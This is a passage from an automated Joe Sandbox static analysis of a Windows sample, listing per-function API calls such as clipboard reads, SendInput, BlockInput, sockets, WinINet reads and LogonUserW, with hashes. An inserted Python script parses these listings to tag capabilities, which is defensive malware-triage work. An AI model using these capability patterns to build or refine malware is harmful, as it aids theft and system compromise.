• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
                                                                                                APIs
                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                • String ID:
                                                                                                • API String ID: 15083398-0
                                                                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                • String ID:
                                                                                                • API String ID: 48322524-0
                                                                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                APIs
                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                • String ID:
                                                                                                • API String ID: 901099227-0
                                                                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                APIs
                                                                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc
                                                                                                • String ID:
                                                                                                • API String ID: 2346855178-0
                                                                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                APIs
                                                                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockInput
                                                                                                • String ID:
                                                                                                • API String ID: 3456056419-0
                                                                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                APIs
                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LogonUser
                                                                                                • String ID:
                                                                                                • API String ID: 1244722697-0
                                                                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
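                                                                                                 The API listings above are the report's own output. As an added example that is not part of the Joe Sandbox report, the Python below parses function records in this listing format (the "APIs" bullets with `Name.MODULE(args), ref: ADDR`, the subcall lines, and the "API ID" / "String ID" fields) and tags each function with the capability its ordered call sequence indicates: clipboard reading, directory enumeration, WinINet reads, BlockInput, LogonUserW and the IShellLink-style CoCreateInstance next to the ".lnk" string. The sample text is a trimmed excerpt of the listings on this page; the tag names, the sequence rules and the `summarize` helper are this example's own assumptions, while the CF_TEXT (1) and CF_UNICODETEXT (13) decodings are the documented Win32 values.

```python
"""Parse per-function API listings from a Joe Sandbox static report and tag
each function with the capability its Win32 call sequence indicates."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API bullet: "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Any other "• Key: value" bullet (API ID, String ID, fuzzy hashes, ...).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

CF_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}  # documented Win32 values

# (tag, ordered API subsequence, required "String ID"); assumed rule set.
RULES = [
    ("clipboard_read", ["OpenClipboard", "GetClipboardData", "CloseClipboard"], None),
    ("file_enumeration", ["FindFirstFileW", "FindNextFileW", "FindClose"], None),
    ("wininet_read", ["InternetQueryDataAvailable", "InternetReadFile"], None),
    ("input_blocking", ["BlockInput"], None),
    ("explicit_logon", ["LogonUserW"], None),
    ("shell_link_com", ["CoCreateInstance"], ".lnk"),
]

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    from_subcall: bool

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def api_names(self) -> List[str]:
        """Direct calls only; subcall lines belong to another function."""
        return [c.name for c in self.calls if not c.from_subcall]

def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every function record starts here
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                         m.group("ref").upper(), m.group("sub") is not None))
            continue
        m = FIELD_LINE.match(line)
        if m and not m.group("key").startswith(("Source File", "Associated")):
            current.fields[m.group("key")] = m.group("val")
    return records

def is_subsequence(needle: List[str], haystack: List[str]) -> bool:
    it = iter(haystack)                    # order matters, gaps are allowed
    return all(n in it for n in needle)

def classify(rec: FunctionRecord) -> List[str]:
    return [tag for tag, seq, s in RULES
            if is_subsequence(seq, rec.api_names)
            and (s is None or rec.fields.get("String ID") == s)]

def clipboard_formats(rec: FunctionRecord) -> List[str]:
    """Decode the CF_* format passed to each GetClipboardData call."""
    out = []
    for c in rec.calls:
        if c.name == "GetClipboardData" and c.args:
            fmt = int(c.args[0], 16)
            out.append(CF_FORMATS.get(fmt, f"0x{fmt:X}"))
    return out

def block_input_enabled(rec: FunctionRecord) -> bool:
    """BlockInput(TRUE) blocks mouse and keyboard input for the desktop."""
    return any(c.name == "BlockInput" and c.args[:1] == ["00000001"] for c in rec.calls)

def summarize(text: str):
    """(first ref, report's API ID, tags) for each function record."""
    return [(r.calls[0].ref if r.calls else None, r.fields.get("API ID", ""), classify(r))
            for r in parse_report(text)]

# Trimmed excerpt of this page's listings (constructed test input).
SAMPLE = """\
APIs
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
"""

if __name__ == "__main__":
    for ref, api_id, tags in summarize(SAMPLE):
        print(ref, api_id, tags)
```

                                                                                                 Feed the script the copied text of a report's "APIs" listings and `summarize` returns one tuple per function: the address of its first call, the report's own API ID, and the capability tags matched. Subcall lines are parsed but kept out of `api_names`, so a GetLastError inside a callee does not count toward the caller's sequence; the "Memory Dump Source" bullets are skipped because they repeat per record.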
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N@
                                                                                                • API String ID: 0-1509896676
                                                                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
